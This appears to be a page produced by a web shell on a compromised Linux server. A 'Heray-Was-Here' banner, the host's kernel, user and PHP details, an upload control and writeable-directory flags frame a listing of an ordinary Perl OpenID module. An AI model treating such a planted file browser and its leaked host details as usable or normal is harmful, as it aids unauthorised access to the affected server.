Heray-Was-Here
Server : Apache
System : Linux vps103298.mylogin.co 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : calvet ( 273824)
PHP Version : 7.4.33
Disable Function : NONE
Directory :  /proc/thread-self/root/usr/share/perl5/vendor_perl/Net/OpenID/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //proc/thread-self/root/usr/share/perl5/vendor_perl/Net/OpenID/ExtensionMessage.pm
package Net::OpenID::ExtensionMessage;
$Net::OpenID::ExtensionMessage::VERSION = '1.20';
use strict;

=head1 NAME

Net::OpenID::ExtensionMessage - Base class for extension messages

=head1 VERSION

version 1.20

=head1 DESCRIPTION

Instances of implementations of the interface provided by this
package are returned from various methods in L<Net::OpenID::Extension>
implementations.

=head1 METHODS

=head2 $emsg->extension_arguments

Return a hashref that maps extension namespace aliases as defined
in the corresponding L<Net::OpenID::Extension> to hashrefs of
key-value pairs for the arguments to include in that namespace.

=cut

sub extension_arguments {
    return {};
}

1;

Hry